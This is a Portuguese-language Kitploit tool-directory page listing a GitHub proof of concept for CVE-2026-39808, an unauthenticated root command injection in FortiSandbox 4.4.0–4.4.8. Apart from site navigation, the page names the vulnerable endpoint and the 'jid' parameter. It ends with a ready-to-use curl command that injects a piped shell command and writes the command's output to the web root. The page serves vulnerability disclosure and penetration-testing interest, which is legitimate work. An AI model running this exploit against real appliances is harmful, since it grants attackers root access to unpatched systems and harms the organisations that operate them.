Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-39808 — PoC for Unauthenticated RCE in FortiSandbox via CVE-2026-39808 | Kitploit
Ferramentas/GitHubGitHub/samu-delucas/cve-2026-39808
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubsamu-delucas/cve-2026-39808

CVE-2026-39808

PoC for Unauthenticated RCE in FortiSandbox via CVE-2026-39808

Ver Repositório
92há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-39808

Em novembro de 2025, uma vulnerabilidade crítica foi descoberta no FortiSandbox da Fortinet que permitia a um atacante não autenticado executar comandos no sistema operacional subjacente como root. A vulnerabilidade foi corrigida e finalmente divulgada em abril de 2026.

Esta vulnerabilidade afeta as versões 4.4.0 a 4.4.8 do FortiSandbox.

Leia o comunicado completo aqui.

A vulnerabilidade

A vulnerabilidade afeta o endpoint /fortisandbox/job-detail/tracer-behavior. Comandos do sistema operacional podem ser injetados usando o símbolo de pipe (|) no parâmetro GET jid.

imagem008

No exemplo acima, a saída foi redirecionada para um arquivo na raiz web, para que pudesse ser recuperada posteriormente.

imagem

PoC

Um simples comando curl é suficiente para obter RCE como root sem autenticação prévia:

root@kitploit:~
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"
Baixar ferramenta